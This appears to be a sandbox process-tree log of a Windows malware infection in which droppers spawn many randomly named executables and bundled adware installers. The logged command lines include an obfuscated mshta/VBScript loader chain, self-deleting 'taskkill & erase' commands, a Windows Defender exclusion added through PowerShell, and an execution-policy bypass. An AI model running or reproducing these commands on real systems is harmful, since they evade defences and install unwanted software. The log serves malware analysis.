C:\Users\Admin\Documents\7gZdxXz2EY6nwbbE_5i1dB1P.exe"C:\Users\Admin\Documents\7gZdxXz2EY6nwbbE_5i1dB1P.exe"6⤵PID:5704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 3887⤵
- Program crash
PID:7016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 4007⤵
- Program crash
PID:7372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 6287⤵
- Program crash
PID:7504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 6167⤵
- Program crash
PID:8220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 6967⤵
- Program crash
PID:8568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 7247⤵
- Program crash
PID:8908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 6727⤵
- Program crash
PID:8144
-
-
C:\Users\Admin\Documents\7gZdxXz2EY6nwbbE_5i1dB1P.exe"C:\Users\Admin\Documents\7gZdxXz2EY6nwbbE_5i1dB1P.exe"7⤵PID:6444
-
-
-
C:\Users\Admin\Documents\WtoywCLDqMtklnJ44nH8yLtG.exe"C:\Users\Admin\Documents\WtoywCLDqMtklnJ44nH8yLtG.exe"6⤵PID:5828
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "WtoywCLDqMtklnJ44nH8yLtG.exe" /f & erase "C:\Users\Admin\Documents\WtoywCLDqMtklnJ44nH8yLtG.exe" & exit7⤵PID:8884
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "WtoywCLDqMtklnJ44nH8yLtG.exe" /f8⤵
- Kills process with taskkill
PID:8408
-
-
-
-
C:\Users\Admin\Documents\YZ5BBzN8_aFmQDY5t70go5jn.exe"C:\Users\Admin\Documents\YZ5BBzN8_aFmQDY5t70go5jn.exe"6⤵PID:6500
-
-
C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe"C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe"6⤵PID:4668
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )7⤵PID:8116
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\YlaWcg1hWuhlEDcVMDv5LOTj.exe") do taskkill -IM "%~nXW" -f8⤵PID:7160
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu99⤵PID:6068
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )10⤵PID:5080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f11⤵PID:5980
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE10⤵PID:7148
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "YlaWcg1hWuhlEDcVMDv5LOTj.exe" -f9⤵
- Kills process with taskkill
PID:4088
-
-
-
-
-
C:\Users\Admin\Documents\mWKYZrx90wFHq1Z671h4JNCC.exe"C:\Users\Admin\Documents\mWKYZrx90wFHq1Z671h4JNCC.exe"6⤵PID:4464
-
-
C:\Users\Admin\Documents\XrTE9cV7nH1QtwX0N3aATBWw.exe"C:\Users\Admin\Documents\XrTE9cV7nH1QtwX0N3aATBWw.exe"6⤵PID:5740
-
-
C:\Users\Admin\Documents\yD4IXBxAMtf1hN4OuOLZCdVQ.exe"C:\Users\Admin\Documents\yD4IXBxAMtf1hN4OuOLZCdVQ.exe"6⤵PID:5632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 9247⤵
- Program crash
PID:4260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 10927⤵
- Program crash
PID:6888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 13487⤵
- Program crash
PID:4984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 13207⤵
- Program crash
PID:6228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 14527⤵
- Program crash
PID:5860
-
-
-
C:\Users\Admin\Documents\R4UgJGhLPQA5udiufMlOVGmW.exe"C:\Users\Admin\Documents\R4UgJGhLPQA5udiufMlOVGmW.exe"6⤵PID:5108
-
C:\Users\Admin\Documents\R4UgJGhLPQA5udiufMlOVGmW.exeC:\Users\Admin\Documents\R4UgJGhLPQA5udiufMlOVGmW.exe7⤵PID:8008
-
-
-
C:\Users\Admin\Documents\V3S59iEgpCcqTfgyUPM2dL05.exe"C:\Users\Admin\Documents\V3S59iEgpCcqTfgyUPM2dL05.exe"6⤵PID:6684
-
C:\Users\Admin\Documents\V3S59iEgpCcqTfgyUPM2dL05.exe"C:\Users\Admin\Documents\V3S59iEgpCcqTfgyUPM2dL05.exe"7⤵PID:7004
-
-
-
C:\Users\Admin\Documents\NQQB7xxBHabL8yOj9tI21zBr.exe"C:\Users\Admin\Documents\NQQB7xxBHabL8yOj9tI21zBr.exe"6⤵PID:4640
-
-
C:\Users\Admin\Documents\iA9OtSe_I8nipp6kjWimpSzv.exe"C:\Users\Admin\Documents\iA9OtSe_I8nipp6kjWimpSzv.exe"6⤵PID:4924
-
C:\Users\Admin\Documents\iA9OtSe_I8nipp6kjWimpSzv.exeC:\Users\Admin\Documents\iA9OtSe_I8nipp6kjWimpSzv.exe7⤵PID:6252
-
-
-
C:\Users\Admin\Documents\Tm0rmIsB_MM3eHf64jaRfX39.exe"C:\Users\Admin\Documents\Tm0rmIsB_MM3eHf64jaRfX39.exe"6⤵PID:3460
-
-
C:\Users\Admin\Documents\nwJeYv1TLSQcjLEv9OBZ5iQl.exe"C:\Users\Admin\Documents\nwJeYv1TLSQcjLEv9OBZ5iQl.exe"6⤵PID:6896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 6607⤵
- Program crash
PID:4656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 6807⤵
- Program crash
PID:8136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 6647⤵
- Program crash
PID:6932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 10887⤵
- Program crash
PID:8572
-
-
-
C:\Users\Admin\Documents\OFS8HtqU18wgXBqRQGrXxIrf.exe"C:\Users\Admin\Documents\OFS8HtqU18wgXBqRQGrXxIrf.exe"6⤵PID:7260
-
-
C:\Users\Admin\Documents\ANXr0mKNMmQyhygMGmnGD0e6.exe"C:\Users\Admin\Documents\ANXr0mKNMmQyhygMGmnGD0e6.exe"6⤵PID:7336
-
-
C:\Users\Admin\Documents\X3AUkO1gbf_qB5LJge0yUZWi.exe"C:\Users\Admin\Documents\X3AUkO1gbf_qB5LJge0yUZWi.exe"6⤵PID:7408
-
-
C:\Users\Admin\Documents\FSh5tIMk_uAxXBPwBfwMot8_.exe"C:\Users\Admin\Documents\FSh5tIMk_uAxXBPwBfwMot8_.exe"6⤵PID:7516
-
-
C:\Users\Admin\Documents\YMOksOCAcPtHP5CCTNKWFnFr.exe"C:\Users\Admin\Documents\YMOksOCAcPtHP5CCTNKWFnFr.exe"6⤵PID:7700
-
C:\Users\Admin\Documents\YMOksOCAcPtHP5CCTNKWFnFr.exe"C:\Users\Admin\Documents\YMOksOCAcPtHP5CCTNKWFnFr.exe"7⤵PID:6672
-
-
-
C:\Users\Admin\Documents\GJ8Qva_kkhFgk1oh8h26h27_.exe"C:\Users\Admin\Documents\GJ8Qva_kkhFgk1oh8h26h27_.exe"6⤵PID:7992
-
C:\Users\Admin\AppData\Roaming\4812548.exe"C:\Users\Admin\AppData\Roaming\4812548.exe"7⤵PID:8320
-
-
C:\Users\Admin\AppData\Roaming\8633772.exe"C:\Users\Admin\AppData\Roaming\8633772.exe"7⤵PID:8356
-
-
C:\Users\Admin\AppData\Roaming\2613960.exe"C:\Users\Admin\AppData\Roaming\2613960.exe"7⤵PID:8392
-
-
C:\Users\Admin\AppData\Roaming\7019463.exe"C:\Users\Admin\AppData\Roaming\7019463.exe"7⤵PID:8468
-
-
-
C:\Users\Admin\Documents\SsRnAytDM_cH93fje9oR5fU_.exe"C:\Users\Admin\Documents\SsRnAytDM_cH93fje9oR5fU_.exe"6⤵PID:8064
-
-
C:\Users\Admin\Documents\ueVnzvM63pBb0IIDSprp38fx.exe"C:\Users\Admin\Documents\ueVnzvM63pBb0IIDSprp38fx.exe"6⤵PID:8096
-
-
C:\Users\Admin\Documents\5soVFYCqg80gL1p9WSFoER4S.exe"C:\Users\Admin\Documents\5soVFYCqg80gL1p9WSFoER4S.exe"6⤵PID:4984
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "5soVFYCqg80gL1p9WSFoER4S.exe" /f & erase "C:\Users\Admin\Documents\5soVFYCqg80gL1p9WSFoER4S.exe" & exit7⤵PID:1876
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5soVFYCqg80gL1p9WSFoER4S.exe" /f8⤵
- Kills process with taskkill
PID:7404
-
-
-
-
C:\Users\Admin\Documents\VzAeFyMMAxHCci2Lhh9Gukon.exe"C:\Users\Admin\Documents\VzAeFyMMAxHCci2Lhh9Gukon.exe"6⤵PID:7748
-
C:\Users\Admin\AppData\Local\Temp\is-Q1UBQ.tmp\VzAeFyMMAxHCci2Lhh9Gukon.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q1UBQ.tmp\VzAeFyMMAxHCci2Lhh9Gukon.tmp" /SL5="$4049E,138429,56832,C:\Users\Admin\Documents\VzAeFyMMAxHCci2Lhh9Gukon.exe"7⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\is-10OEU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-10OEU.tmp\Setup.exe" /Verysilent8⤵PID:8724
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵PID:8692
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:10012
-
-
-
-
-
-
C:\Users\Admin\Documents\rsmgJCA83vaoAxMyBpz7OtbD.exe"C:\Users\Admin\Documents\rsmgJCA83vaoAxMyBpz7OtbD.exe"6⤵PID:7272
-
C:\Users\Admin\Documents\rsmgJCA83vaoAxMyBpz7OtbD.exe"C:\Users\Admin\Documents\rsmgJCA83vaoAxMyBpz7OtbD.exe" -q7⤵PID:6792
-
-
-
C:\Users\Admin\Documents\gcupVswiZM2SWqMBovuBKCN1.exe"C:\Users\Admin\Documents\gcupVswiZM2SWqMBovuBKCN1.exe"6⤵PID:7904
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\GCUPVS~1.DLL,s C:\Users\Admin\DOCUME~1\GCUPVS~1.EXE7⤵PID:9428
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GCUPVS~1.DLL,SkUFNw==8⤵PID:1836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\GCUPVS~1.DLL9⤵PID:10996
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GCUPVS~1.DLL,Wz0d9⤵PID:10928
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 3180410⤵PID:10460
-
C:\Windows\system32\ctfmon.exectfmon.exe11⤵PID:6256
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpBDB.tmp.ps1"9⤵PID:10280
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:1256
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵PID:4552
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵PID:1576
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵PID:4636
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-221JA.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-221JA.tmp\VPN.tmp" /SL5="$10374,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent1⤵PID:4792
-
C:\Users\Admin\AppData\Local\Temp\is-VKUB5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VKUB5.tmp\Setup.exe" /silent /subid=7202⤵PID:8076
-
C:\Users\Admin\AppData\Local\Temp\is-OK435.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-OK435.tmp\Setup.tmp" /SL5="$30314,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-VKUB5.tmp\Setup.exe" /silent /subid=7203⤵PID:2160
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "4⤵PID:5244
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09015⤵PID:8212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "4⤵PID:9148
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09015⤵PID:8668
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall4⤵PID:8072
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install4⤵PID:9220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-7OCSM.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-7OCSM.tmp\WEATHER Manager.tmp" /SL5="$10362,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent1⤵PID:3076
-
C:\Users\Admin\AppData\Local\Temp\is-PG99H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PG99H.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7152⤵PID:7060
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-PG99H.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-PG99H.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"3⤵PID:8048
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:6084
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4768
-
C:\ProgramData\rnvnrm\xkekicj.exeC:\ProgramData\rnvnrm\xkekicj.exe start1⤵PID:7620
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7040
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0ED81207733C6ECA7FB4BDD19DF5B9AC C2⤵PID:5764
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 21F4A264BA7CC57AB118B5FC77D29FA92⤵PID:8976
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2EA1501D0A4D785599154B035009A41E C2⤵PID:8864
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EA6D82AC7233B519BACAA1FEF06EDD3A C2⤵PID:8216
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:10228
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:8072
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:6012
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ff96400dec0,0x7ff96400ded0,0x7ff96400dee05⤵PID:5956
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7fb119e70,0x7ff7fb119e80,0x7ff7fb119e906⤵PID:8920
-
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=1904 /prefetch:85⤵PID:9700
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=1892 /prefetch:85⤵PID:5492
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1844 /prefetch:25⤵PID:9420
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2516 /prefetch:15⤵PID:9480
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2500 /prefetch:15⤵PID:11052
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=3052 /prefetch:85⤵PID:10828
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3336 /prefetch:25⤵PID:10608
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=2176 /prefetch:85⤵PID:5300
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=3464 /prefetch:85⤵PID:368
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=3412 /prefetch:85⤵PID:10532
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1518887179799764213,4970876469676260911,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6012_347234889" --mojo-platform-channel-handle=3712 /prefetch:85⤵PID:10564
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_83B5.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:9856
-
-
